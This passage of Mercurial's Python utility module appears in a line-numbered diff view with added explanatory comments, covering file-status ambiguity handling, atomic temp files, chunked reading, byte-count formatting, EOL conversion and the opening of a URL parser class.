1829 1830
1830 1831 re = _re()
1831 1832
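# A minimal sketch of the wrapper above (pattern hypothetical):
#
#   matcher = re.compile(br'[0-9a-f]+', remod.IGNORECASE)
#   matcher.match(b'DEADBEEF')
#
# When re2 is importable, IGNORECASE/MULTILINE are rewritten into inline
# (?i)/(?m) prefixes because re2 compiles from the pattern alone; any
# other flag forces the stdlib re fallback.
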
1832 1833 _fspathcache = {}
1833 1834 def fspath(name, root):
1834 1835 '''Get name in the case stored in the filesystem
1835 1836
1836 1837 The name should be relative to root, and be normcase-ed for efficiency.
1837 1838
1838 1839 Note that this function is unnecessary, and should not be
1839 1840 called, for case-sensitive filesystems (simply because it's expensive).
1840 1841
1841 1842 The root should be normcase-ed, too.
1842 1843 '''
1843 1844 def _makefspathcacheentry(dir):
1844 1845 return dict((normcase(n), n) for n in os.listdir(dir))
1845 1846
1846 1847 seps = pycompat.ossep
1847 1848 if pycompat.osaltsep:
1848 1849 seps = seps + pycompat.osaltsep
1849 1850 # Protect backslashes. This gets silly very quickly.
1850 1851 seps = seps.replace('\\','\\\\')
1851 1852 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1852 1853 dir = os.path.normpath(root)
1853 1854 result = []
1854 1855 for part, sep in pattern.findall(name):
1855 1856 if sep:
1856 1857 result.append(sep)
1857 1858 continue
1858 1859
1859 1860 if dir not in _fspathcache:
1860 1861 _fspathcache[dir] = _makefspathcacheentry(dir)
1861 1862 contents = _fspathcache[dir]
1862 1863
1863 1864 found = contents.get(part)
1864 1865 if not found:
1865 1866 # retry "once per directory" per "dirstate.walk" which
1866 1867 # may take place for each patch of "hg qpush", for example
1867 1868 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1868 1869 found = contents.get(part)
1869 1870
1870 1871 result.append(found or part)
1871 1872 dir = os.path.join(dir, part)
1872 1873
1873 1874 return ''.join(result)
1874 1875
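# Sketch of the intended behavior (layout hypothetical): with a file
# stored on disk as 'Foo/Bar.txt' under root '/repo', a caller holding
# the normcase-ed name recovers the on-disk spelling:
#
#   fspath(b'foo/bar.txt', b'/repo')   # -> 'Foo/Bar.txt'
#
# Lookups are served from _fspathcache, with one retry per directory to
# pick up entries created after the cache was populated.
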
1875 1876 def checknlink(testfile):
1876 1877 '''check whether hardlink count reporting works properly'''
1877 1878
1878 1879 # testfile may be open, so we need a separate file for checking to
1879 1880 # work around issue2543 (or testfile may get lost on Samba shares)
1880 1881 f1, f2, fp = None, None, None
1881 1882 try:
1882 1883 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1883 1884 suffix='1~', dir=os.path.dirname(testfile))
1884 1885 os.close(fd)
1885 1886 f2 = '%s2~' % f1[:-2]
1886 1887
1887 1888 oslink(f1, f2)
1888 1889 # nlinks() may behave differently for files on Windows shares if
1889 1890 # the file is open.
1890 1891 fp = posixfile(f2)
1891 1892 return nlinks(f2) > 1
1892 1893 except OSError:
1893 1894 return False
1894 1895 finally:
1895 1896 if fp is not None:
1896 1897 fp.close()
1897 1898 for f in (f1, f2):
1898 1899 try:
1899 1900 if f is not None:
1900 1901 os.unlink(f)
1901 1902 except OSError:
1902 1903 pass
1903 1904
1904 1905 def endswithsep(path):
1905 1906 '''Check path ends with os.sep or os.altsep.'''
1906 1907 return (path.endswith(pycompat.ossep)
1907 1908 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1908 1909
1909 1910 def splitpath(path):
1910 1911 '''Split path by os.sep.
1911 1912 Note that this function does not use os.altsep because it is
1912 1913 an alternative to a simple "xxx.split(os.sep)".
1913 1914 It is recommended to run os.path.normpath() on the path before
1914 1915 using this function if needed.'''
1915 1916 return path.split(pycompat.ossep)
1916 1917
1917 1918 def mktempcopy(name, emptyok=False, createmode=None):
1918 1919 """Create a temporary file with the same contents from name
1919 1920
1920 1921 The permission bits are copied from the original file.
1921 1922
1922 1923 If the temporary file is going to be truncated immediately, you
1923 1924 can use emptyok=True as an optimization.
1924 1925
1925 1926 Returns the name of the temporary file.
1926 1927 """
1927 1928 d, fn = os.path.split(name)
1928 1929 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1929 1930 os.close(fd)
1930 1931 # Temporary files are created with mode 0600, which is usually not
1931 1932 # what we want. If the original file already exists, just copy
1932 1933 # its mode. Otherwise, manually obey umask.
1933 1934 copymode(name, temp, createmode)
1934 1935 if emptyok:
1935 1936 return temp
1936 1937 try:
1937 1938 try:
1938 1939 ifp = posixfile(name, "rb")
1939 1940 except IOError as inst:
1940 1941 if inst.errno == errno.ENOENT:
1941 1942 return temp
1942 1943 if not getattr(inst, 'filename', None):
1943 1944 inst.filename = name
1944 1945 raise
1945 1946 ofp = posixfile(temp, "wb")
1946 1947 for chunk in filechunkiter(ifp):
1947 1948 ofp.write(chunk)
1948 1949 ifp.close()
1949 1950 ofp.close()
1950 1951 except: # re-raises
1951 1952 try:
1952 1953 os.unlink(temp)
1953 1954 except OSError:
1954 1955 pass
1955 1956 raise
1956 1957 return temp
1957 1958
1958 1959 class filestat(object):
1959 1960 """help to exactly detect change of a file
1960 1961
1961 1962 'stat' attribute is result of 'os.stat()' if specified 'path'
1962 1963 exists. Otherwise, it is None. This can avoid preparative
1963 1964 'exists()' examination on client side of this class.
1964 1965 """
1965 1966 def __init__(self, stat):
1966 1967 self.stat = stat
1967 1968
1968 1969 @classmethod
1969 1970 def frompath(cls, path):
1970 1971 try:
1971 1972 stat = os.stat(path)
1972 1973 except OSError as err:
1973 1974 if err.errno != errno.ENOENT:
1974 1975 raise
1975 1976 stat = None
1976 1977 return cls(stat)
1977 1978
1978 1979 @classmethod
1979 1980 def fromfp(cls, fp):
1980 1981 stat = os.fstat(fp.fileno())
1981 1982 return cls(stat)
1982 1983
1983 1984 __hash__ = object.__hash__
1984 1985
1985 1986 def __eq__(self, old):
1986 1987 try:
1987 1988 # if ambiguity between stat of new and old file is
1988 1989 # avoided, comparison of size, ctime and mtime is enough
1989 1990 # to exactly detect change of a file regardless of platform
1990 1991 return (self.stat.st_size == old.stat.st_size and
1991 1992 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1992 1993 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1993 1994 except AttributeError:
1994 1995 pass
1995 1996 try:
1996 1997 return self.stat is None and old.stat is None
1997 1998 except AttributeError:
1998 1999 return False
1999 2000
2000 2001 def isambig(self, old):
2001 2002 """Examine whether new (= self) stat is ambiguous against old one
2002 2003
2003 2004 "S[N]" below means stat of a file at N-th change:
2004 2005
2005 2006 - S[n-1].ctime < S[n].ctime: can detect change of a file
2006 2007 - S[n-1].ctime == S[n].ctime
2007 2008 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2008 2009 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2009 2010 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2010 2011 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2011 2012
2012 2013 Case (*2) above means that a file was changed twice or more
2013 2014 within the same second (= S[n-1].ctime), so comparing
2014 2015 timestamps cannot distinguish those changes.
2015 2016 
2016 2017 The basic idea for avoiding such ambiguity is to advance mtime
2017 2018 by 1 sec whenever the timestamp is ambiguous.
2018 2019 
2019 2020 But advancing mtime only in case (*2) doesn't work as
2020 2021 expected, because a naturally advanced S[n].mtime in case (*1)
2021 2022 might be equal to a manually advanced S[n-1 or earlier].mtime.
2022 2023 
2023 2024 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2024 2025 treated as ambiguous regardless of mtime, to avoid overlooking
2025 2026 a change hidden by such colliding mtimes.
2026 2027
2027 2028 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2028 2029 S[n].mtime", even if size of a file isn't changed.
2029 2030 """
2030 2031 try:
2031 2032 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2032 2033 except AttributeError:
2033 2034 return False
2034 2035
2035 2036 def avoidambig(self, path, old):
2036 2037 """Change file stat of specified path to avoid ambiguity
2037 2038
2038 2039 'old' should be previous filestat of 'path'.
2039 2040
2040 2041 Avoiding ambiguity is skipped if the process doesn't have
2041 2042 appropriate privileges for 'path', in which case this returns
2042 2043 False.
2043 2044 
2044 2045 Otherwise, this returns True, meaning the ambiguity was avoided.
2045 2046 """
2046 2047 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2047 2048 try:
2048 2049 os.utime(path, (advanced, advanced))
2049 2050 except OSError as inst:
2050 2051 if inst.errno == errno.EPERM:
2051 2052 # utime() on the file created by another user causes EPERM,
2052 2053 # if a process doesn't have appropriate privileges
2053 2054 return False
2054 2055 raise
2055 2056 return True
2056 2057
2057 2058 def __ne__(self, other):
2058 2059 return not self == other
2059 2060
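# A worked example of the ambiguity above (timestamps illustrative): if a
# file is written at t=10.2s and rewritten with the same size at t=10.8s,
# both stats report ctime == mtime == 10 in whole seconds, so old == new
# and isambig() returns True. avoidambig() then bumps mtime to 11, making
# the second write distinguishable from the first.
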
2060 2061 class atomictempfile(object):
2061 2062 '''writable file object that atomically updates a file
2062 2063
2063 2064 All writes will go to a temporary copy of the original file. Call
2064 2065 close() when you are done writing, and atomictempfile will rename
2065 2066 the temporary copy to the original name, making the changes
2066 2067 visible. If the object is destroyed without being closed, all your
2067 2068 writes are discarded.
2068 2069
2069 2070 The checkambig argument of the constructor is used with filestat,
2070 2071 and is useful only if the target file is guarded by a lock
2071 2072 (e.g. repo.lock or repo.wlock).
2072 2073 '''
2073 2074 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2074 2075 self.__name = name # permanent name
2075 2076 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2076 2077 createmode=createmode)
2077 2078 self._fp = posixfile(self._tempname, mode)
2078 2079 self._checkambig = checkambig
2079 2080
2080 2081 # delegated methods
2081 2082 self.read = self._fp.read
2082 2083 self.write = self._fp.write
2083 2084 self.seek = self._fp.seek
2084 2085 self.tell = self._fp.tell
2085 2086 self.fileno = self._fp.fileno
2086 2087
2087 2088 def close(self):
2088 2089 if not self._fp.closed:
2089 2090 self._fp.close()
2090 2091 filename = localpath(self.__name)
2091 2092 oldstat = self._checkambig and filestat.frompath(filename)
2092 2093 if oldstat and oldstat.stat:
2093 2094 rename(self._tempname, filename)
2094 2095 newstat = filestat.frompath(filename)
2095 2096 if newstat.isambig(oldstat):
2096 2097 # stat of changed file is ambiguous to original one
2097 2098 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2098 2099 os.utime(filename, (advanced, advanced))
2099 2100 else:
2100 2101 rename(self._tempname, filename)
2101 2102
2102 2103 def discard(self):
2103 2104 if not self._fp.closed:
2104 2105 try:
2105 2106 os.unlink(self._tempname)
2106 2107 except OSError:
2107 2108 pass
2108 2109 self._fp.close()
2109 2110
2110 2111 def __del__(self):
2111 2112 if safehasattr(self, '_fp'): # constructor actually did something
2112 2113 self.discard()
2113 2114
2114 2115 def __enter__(self):
2115 2116 return self
2116 2117
2117 2118 def __exit__(self, exctype, excvalue, traceback):
2118 2119 if exctype is not None:
2119 2120 self.discard()
2120 2121 else:
2121 2122 self.close()
2122 2123
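# Typical usage, as a sketch (file name hypothetical):
#
#   with atomictempfile(b'data.bin', checkambig=True) as fp:
#       fp.write(b'new contents')
#
# A clean exit renames the temporary copy over 'data.bin'; if the body
# raises, discard() unlinks the temporary file and the original is left
# untouched.
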
2123 2124 def unlinkpath(f, ignoremissing=False):
2124 2125 """unlink and remove the directory if it is empty"""
2125 2126 if ignoremissing:
2126 2127 tryunlink(f)
2127 2128 else:
2128 2129 unlink(f)
2129 2130 # try removing directories that might now be empty
2130 2131 try:
2131 2132 removedirs(os.path.dirname(f))
2132 2133 except OSError:
2133 2134 pass
2134 2135
2135 2136 def tryunlink(f):
2136 2137 """Attempt to remove a file, ignoring ENOENT errors."""
2137 2138 try:
2138 2139 unlink(f)
2139 2140 except OSError as e:
2140 2141 if e.errno != errno.ENOENT:
2141 2142 raise
2142 2143
2143 2144 def makedirs(name, mode=None, notindexed=False):
2144 2145 """recursive directory creation with parent mode inheritance
2145 2146
2146 2147 Newly created directories are marked as "not to be indexed by
2147 2148 the content indexing service", if ``notindexed`` is specified
2148 2149 for "write" mode access.
2149 2150 """
2150 2151 try:
2151 2152 makedir(name, notindexed)
2152 2153 except OSError as err:
2153 2154 if err.errno == errno.EEXIST:
2154 2155 return
2155 2156 if err.errno != errno.ENOENT or not name:
2156 2157 raise
2157 2158 parent = os.path.dirname(os.path.abspath(name))
2158 2159 if parent == name:
2159 2160 raise
2160 2161 makedirs(parent, mode, notindexed)
2161 2162 try:
2162 2163 makedir(name, notindexed)
2163 2164 except OSError as err:
2164 2165 # Catch EEXIST to handle races
2165 2166 if err.errno == errno.EEXIST:
2166 2167 return
2167 2168 raise
2168 2169 if mode is not None:
2169 2170 os.chmod(name, mode)
2170 2171
2171 2172 def readfile(path):
2172 2173 with open(path, 'rb') as fp:
2173 2174 return fp.read()
2174 2175
2175 2176 def writefile(path, text):
2176 2177 with open(path, 'wb') as fp:
2177 2178 fp.write(text)
2178 2179
2179 2180 def appendfile(path, text):
2180 2181 with open(path, 'ab') as fp:
2181 2182 fp.write(text)
2182 2183
2183 2184 class chunkbuffer(object):
2184 2185 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 2186 iterator over chunks of arbitrary size."""
2186 2187
2187 2188 def __init__(self, in_iter):
2188 2189 """in_iter is the iterator that's iterating over the input chunks."""
2189 2190 def splitbig(chunks):
2190 2191 for chunk in chunks:
2191 2192 if len(chunk) > 2**20:
2192 2193 pos = 0
2193 2194 while pos < len(chunk):
2194 2195 end = pos + 2 ** 18
2195 2196 yield chunk[pos:end]
2196 2197 pos = end
2197 2198 else:
2198 2199 yield chunk
2199 2200 self.iter = splitbig(in_iter)
2200 2201 self._queue = collections.deque()
2201 2202 self._chunkoffset = 0
2202 2203
2203 2204 def read(self, l=None):
2204 2205 """Read L bytes of data from the iterator of chunks of data.
2205 2206 Returns less than L bytes if the iterator runs dry.
2206 2207
2207 2208 If size parameter is omitted, read everything"""
2208 2209 if l is None:
2209 2210 return ''.join(self.iter)
2210 2211
2211 2212 left = l
2212 2213 buf = []
2213 2214 queue = self._queue
2214 2215 while left > 0:
2215 2216 # refill the queue
2216 2217 if not queue:
2217 2218 target = 2**18
2218 2219 for chunk in self.iter:
2219 2220 queue.append(chunk)
2220 2221 target -= len(chunk)
2221 2222 if target <= 0:
2222 2223 break
2223 2224 if not queue:
2224 2225 break
2225 2226
2226 2227 # The easy way to do this would be to queue.popleft(), modify the
2227 2228 # chunk (if necessary), then queue.appendleft(). However, for cases
2228 2229 # where we read partial chunk content, this incurs 2 dequeue
2229 2230 # mutations and creates a new str for the remaining chunk in the
2230 2231 # queue. Our code below avoids this overhead.
2231 2232
2232 2233 chunk = queue[0]
2233 2234 chunkl = len(chunk)
2234 2235 offset = self._chunkoffset
2235 2236
2236 2237 # Use full chunk.
2237 2238 if offset == 0 and left >= chunkl:
2238 2239 left -= chunkl
2239 2240 queue.popleft()
2240 2241 buf.append(chunk)
2241 2242 # self._chunkoffset remains at 0.
2242 2243 continue
2243 2244
2244 2245 chunkremaining = chunkl - offset
2245 2246
2246 2247 # Use all of unconsumed part of chunk.
2247 2248 if left >= chunkremaining:
2248 2249 left -= chunkremaining
2249 2250 queue.popleft()
2250 2251 # offset == 0 is enabled by block above, so this won't merely
2251 2252 # copy via ``chunk[0:]``.
2252 2253 buf.append(chunk[offset:])
2253 2254 self._chunkoffset = 0
2254 2255
2255 2256 # Partial chunk needed.
2256 2257 else:
2257 2258 buf.append(chunk[offset:offset + left])
2258 2259 self._chunkoffset += left
2259 2260 left -= chunkremaining
2260 2261
2261 2262 return ''.join(buf)
2262 2263
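# A REPL-style sketch of the buffering behavior:
#
#   cb = chunkbuffer(iter([b'abc', b'defg']))
#   cb.read(2)   # -> 'ab'   (partial chunk; only the offset advances)
#   cb.read(4)   # -> 'cdef' (rest of first chunk plus part of second)
#
# A chunk is never copied until part of it is consumed, which is what the
# offset bookkeeping above buys.
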
2263 2264 def filechunkiter(f, size=131072, limit=None):
2264 2265 """Create a generator that produces the data in the file size
2265 2266 (default 131072) bytes at a time, up to optional limit (default is
2266 2267 to read all data). Chunks may be less than size bytes if the
2267 2268 chunk is the last chunk in the file, or the file is a socket or
2268 2269 some other type of file that sometimes reads less data than is
2269 2270 requested."""
2270 2271 assert size >= 0
2271 2272 assert limit is None or limit >= 0
2272 2273 while True:
2273 2274 if limit is None:
2274 2275 nbytes = size
2275 2276 else:
2276 2277 nbytes = min(limit, size)
2277 2278 s = nbytes and f.read(nbytes)
2278 2279 if not s:
2279 2280 break
2280 2281 if limit:
2281 2282 limit -= len(s)
2282 2283 yield s
2283 2284
2284 2285 class cappedreader(object):
2285 2286 """A file object proxy that allows reading up to N bytes.
2286 2287
2287 2288 Given a source file object, instances of this type allow reading up to
2288 2289 N bytes from that source file object. Attempts to read past the allowed
2289 2290 limit are treated as EOF.
2290 2291
2291 2292 It is assumed that no I/O is performed on the original file object
2292 2293 other than the I/O performed through this instance. If other I/O
2293 2294 occurs, state tracking gets out of sync and unexpected results ensue.
2294 2295 """
2295 2296 def __init__(self, fh, limit):
2296 2297 """Allow reading up to <limit> bytes from <fh>."""
2297 2298 self._fh = fh
2298 2299 self._left = limit
2299 2300
2300 2301 def read(self, n=-1):
2301 2302 if not self._left:
2302 2303 return b''
2303 2304
2304 2305 if n < 0:
2305 2306 n = self._left
2306 2307
2307 2308 data = self._fh.read(min(n, self._left))
2308 2309 self._left -= len(data)
2309 2310 assert self._left >= 0
2310 2311
2311 2312 return data
2312 2313
2313 2314 def readinto(self, b):
2314 2315 res = self.read(len(b))
2315 2316 if res is None:
2316 2317 return None
2317 2318
2318 2319 b[0:len(res)] = res
2319 2320 return len(res)
2320 2321
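# For instance, cappedreader(fh, 100) over a 1000-byte stream returns at
# most 100 bytes in total; once the limit is consumed, read() returns b''
# exactly as if EOF had been reached, however much data fh still holds.
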
2321 2322 def unitcountfn(*unittable):
2322 2323 '''return a function that renders a readable count of some quantity'''
2323 2324
2324 2325 def go(count):
2325 2326 for multiplier, divisor, format in unittable:
2326 2327 if abs(count) >= divisor * multiplier:
2327 2328 return format % (count / float(divisor))
2328 2329 return unittable[-1][2] % count
2329 2330
2330 2331 return go
2331 2332
2332 2333 def processlinerange(fromline, toline):
2333 2334 """Check that linerange <fromline>:<toline> makes sense and return a
2334 2335 0-based range.
2335 2336
2336 2337 >>> processlinerange(10, 20)
2337 2338 (9, 20)
2338 2339 >>> processlinerange(2, 1)
2339 2340 Traceback (most recent call last):
2340 2341 ...
2341 2342 ParseError: line range must be positive
2342 2343 >>> processlinerange(0, 5)
2343 2344 Traceback (most recent call last):
2344 2345 ...
2345 2346 ParseError: fromline must be strictly positive
2346 2347 """
2347 2348 if toline - fromline < 0:
2348 2349 raise error.ParseError(_("line range must be positive"))
2349 2350 if fromline < 1:
2350 2351 raise error.ParseError(_("fromline must be strictly positive"))
2351 2352 return fromline - 1, toline
2352 2353
2353 2354 bytecount = unitcountfn(
2354 2355 (100, 1 << 30, _('%.0f GB')),
2355 2356 (10, 1 << 30, _('%.1f GB')),
2356 2357 (1, 1 << 30, _('%.2f GB')),
2357 2358 (100, 1 << 20, _('%.0f MB')),
2358 2359 (10, 1 << 20, _('%.1f MB')),
2359 2360 (1, 1 << 20, _('%.2f MB')),
2360 2361 (100, 1 << 10, _('%.0f KB')),
2361 2362 (10, 1 << 10, _('%.1f KB')),
2362 2363 (1, 1 << 10, _('%.2f KB')),
2363 2364 (1, 1, _('%.0f bytes')),
2364 2365 )
2365 2366
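# The table is scanned top-down and the first matching threshold wins:
#
#   bytecount(2252)             # -> '2.20 KB' (1 KB <= 2252 < 10 KB)
#   bytecount(150 * (1 << 20))  # -> '150 MB'
#
# Values below 1 KB fall through to the final '%.0f bytes' entry.
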
2366 2367 class transformingwriter(object):
2367 2368 """Writable file wrapper to transform data by function"""
2368 2369
2369 2370 def __init__(self, fp, encode):
2370 2371 self._fp = fp
2371 2372 self._encode = encode
2372 2373
2373 2374 def close(self):
2374 2375 self._fp.close()
2375 2376
2376 2377 def flush(self):
2377 2378 self._fp.flush()
2378 2379
2379 2380 def write(self, data):
2380 2381 return self._fp.write(self._encode(data))
2381 2382
2382 2383 # Matches a single EOL which can either be a CRLF where repeated CR
2383 2384 # are removed or a LF. We do not care about old Macintosh files, so a
2384 2385 # stray CR is an error.
2385 2386 _eolre = remod.compile(br'\r*\n')
2386 2387
2387 2388 def tolf(s):
2388 2389 return _eolre.sub('\n', s)
2389 2390
2390 2391 def tocrlf(s):
2391 2392 return _eolre.sub('\r\n', s)
2392 2393
2393 2394 def _crlfwriter(fp):
2394 2395 return transformingwriter(fp, tocrlf)
2395 2396
2396 2397 if pycompat.oslinesep == '\r\n':
2397 2398 tonativeeol = tocrlf
2398 2399 fromnativeeol = tolf
2399 2400 nativeeolwriter = _crlfwriter
2400 2401 else:
2401 2402 tonativeeol = pycompat.identity
2402 2403 fromnativeeol = pycompat.identity
2403 2404 nativeeolwriter = pycompat.identity
2404 2405
2405 2406 if (pyplatform.python_implementation() == 'CPython' and
2406 2407 sys.version_info < (3, 0)):
2407 2408 # There is an issue in CPython that some IO methods do not handle EINTR
2408 2409 # correctly. The following table shows what CPython version (and functions)
2409 2410 # are affected (buggy: has the EINTR bug, okay: otherwise):
2410 2411 #
2411 2412 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2412 2413 # --------------------------------------------------
2413 2414 # fp.__iter__ | buggy | buggy | okay
2414 2415 # fp.read* | buggy | okay [1] | okay
2415 2416 #
2416 2417 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2417 2418 #
2418 2419 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2419 2420 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2420 2421 #
2421 2422 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2422 2423 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2423 2424 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2424 2425 # fp.__iter__ but not other fp.read* methods.
2425 2426 #
2426 2427 # On modern systems like Linux, the "read" syscall cannot be interrupted
2427 2428 # when reading "fast" files like on-disk files. So the EINTR issue only
2428 2429 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2429 2430 # files approximately as "fast" files and use the fast (unsafe) code path,
2430 2431 # to minimize the performance impact.
2431 2432 if sys.version_info >= (2, 7, 4):
2432 2433 # fp.readline deals with EINTR correctly, use it as a workaround.
2433 2434 def _safeiterfile(fp):
2434 2435 return iter(fp.readline, '')
2435 2436 else:
2436 2437 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2437 2438 # note: this may block longer than necessary because of bufsize.
2438 2439 def _safeiterfile(fp, bufsize=4096):
2439 2440 fd = fp.fileno()
2440 2441 line = ''
2441 2442 while True:
2442 2443 try:
2443 2444 buf = os.read(fd, bufsize)
2444 2445 except OSError as ex:
2445 2446 # os.read only raises EINTR before any data is read
2446 2447 if ex.errno == errno.EINTR:
2447 2448 continue
2448 2449 else:
2449 2450 raise
2450 2451 line += buf
2451 2452 if '\n' in buf:
2452 2453 splitted = line.splitlines(True)
2453 2454 line = ''
2454 2455 for l in splitted:
2455 2456 if l[-1] == '\n':
2456 2457 yield l
2457 2458 else:
2458 2459 line = l
2459 2460 if not buf:
2460 2461 break
2461 2462 if line:
2462 2463 yield line
2463 2464
2464 2465 def iterfile(fp):
2465 2466 fastpath = True
2466 2467 if type(fp) is file:
2467 2468 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2468 2469 if fastpath:
2469 2470 return fp
2470 2471 else:
2471 2472 return _safeiterfile(fp)
2472 2473 else:
2473 2474 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2474 2475 def iterfile(fp):
2475 2476 return fp
2476 2477
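# Either way, callers iterate uniformly (process() is a stand-in):
#
#   for line in iterfile(fp):
#       process(line)
#
# On the affected CPython 2 versions this routes pipes, sockets and ttys
# through the EINTR-safe path while regular files keep the fast buffered
# iterator.
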
2477 2478 def iterlines(iterator):
2478 2479 for chunk in iterator:
2479 2480 for line in chunk.splitlines():
2480 2481 yield line
2481 2482
2482 2483 def expandpath(path):
2483 2484 return os.path.expanduser(os.path.expandvars(path))
2484 2485
2485 2486 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2486 2487 """Return the result of interpolating items in the mapping into string s.
2487 2488
2488 2489 prefix is a single character string, or a two character string with
2489 2490 a backslash as the first character if the prefix needs to be escaped in
2490 2491 a regular expression.
2491 2492
2492 2493 fn is an optional function that will be applied to the replacement text
2493 2494 just before replacement.
2494 2495
2495 2496 escape_prefix is an optional flag that allows escaping the prefix by
2496 2497 doubling it.
2497 2498 """
2498 2499 fn = fn or (lambda s: s)
2499 2500 patterns = '|'.join(mapping.keys())
2500 2501 if escape_prefix:
2501 2502 patterns += '|' + prefix
2502 2503 if len(prefix) > 1:
2503 2504 prefix_char = prefix[1:]
2504 2505 else:
2505 2506 prefix_char = prefix
2506 2507 mapping[prefix_char] = prefix_char
2507 2508 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2508 2509 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509 2510
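# REPL-style sketch (mapping and string hypothetical):
#
#   interpolate(b'%', {b'user': b'alice'}, b'hello %user')
#   # -> 'hello alice'
#
# With escape_prefix=True, a doubled prefix ('%%') collapses to a literal
# '%' in the output.
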
2510 2511 def getport(port):
2511 2512 """Return the port for a given network service.
2512 2513
2513 2514 If port is an integer, it's returned as is. If it's a string, it's
2514 2515 looked up using socket.getservbyname(). If there's no matching
2515 2516 service, error.Abort is raised.
2516 2517 """
2517 2518 try:
2518 2519 return int(port)
2519 2520 except ValueError:
2520 2521 pass
2521 2522
2522 2523 try:
2523 2524 return socket.getservbyname(pycompat.sysstr(port))
2524 2525 except socket.error:
2525 2526 raise error.Abort(_("no port number associated with service '%s'")
2526 2527 % port)
2527 2528
2528 2529 class url(object):
2529 2530 r"""Reliable URL parser.
2530 2531
2531 2532 This parses URLs and provides attributes for the following
2532 2533 components:
2533 2534
2534 2535 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535 2536
2536 2537 Missing components are set to None. The only exception is
2537 2538 fragment, which is set to '' if present but empty.
2538 2539
2539 2540 If parsefragment is False, fragment is included in query. If
2540 2541 parsequery is False, query is included in path. If both are
2541 2542 False, both fragment and query are included in path.
2542 2543
2543 2544 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544 2545
2545 2546 Note that for backward compatibility reasons, bundle URLs do not
2546 2547 take host names. That means 'bundle://../' has a path of '../'.
2547 2548
2548 2549 Examples:
2549 2550
2550 2551 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 2552 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 2553 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 2554 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 2555 >>> url(b'file:///home/joe/repo')
2555 2556 <url scheme: 'file', path: '/home/joe/repo'>
2556 2557 >>> url(b'file:///c:/temp/foo/')
2557 2558 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 2559 >>> url(b'bundle:foo')
2559 2560 <url scheme: 'bundle', path: 'foo'>
2560 2561 >>> url(b'bundle://../foo')
2561 2562 <url scheme: 'bundle', path: '../foo'>
2562 2563 >>> url(br'c:\foo\bar')
2563 2564 <url path: 'c:\\foo\\bar'>
2564 2565 >>> url(br'\\blah\blah\blah')
2565 2566 <url path: '\\\\blah\\blah\\blah'>
2566 2567 >>> url(br'\\blah\blah\blah#baz')
2567 2568 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 2569 >>> url(br'file:///C:\users\me')
2569 2570 <url scheme: 'file', path: 'C:\\users\\me'>
2570 2571
2571 2572 Authentication credentials:
2572 2573
2573 2574 >>> url(b'ssh://joe:xyz@x/repo')
2574 2575 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 2576 >>> url(b'ssh://joe@x/repo')
2576 2577 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577 2578
2578 2579 Query strings and fragments:
2579 2580
2580 2581 >>> url(b'http://host/a?b#c')
2581 2582 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 2583 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 2584 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584 2585
2585 2586 Empty path:
2586 2587
2587 2588 >>> url(b'')
2588 2589 <url path: ''>
2589 2590 >>> url(b'#a')
2590 2591 <url path: '', fragment: 'a'>
2591 2592 >>> url(b'http://host/')
2592 2593 <url scheme: 'http', host: 'host', path: ''>
2593 2594 >>> url(b'http://host/#a')
2594 2595 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595 2596
2596 2597 Only scheme:
2597 2598
2598 2599 >>> url(b'http:')
2599 2600 <url scheme: 'http'>
2600 2601 """
2601 2602
2602 2603 _safechars = "!~*'()+"
2603 2604 _safepchars = "/!~*'()+:\\"
2604 2605 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605 2606
2606 2607 def __init__(self, path, parsequery=True, parsefragment=True):
2607 2608 # We slowly chomp away at path until we have only the path left
2608 2609 self.scheme = self.user = self.passwd = self.host = None
2609 2610 self.port = self.path = self.query = self.fragment = None
2610 2611 self._localpath = True
2611 2612 self._hostport = ''
2612 2613 self._origpath = path
2613 2614
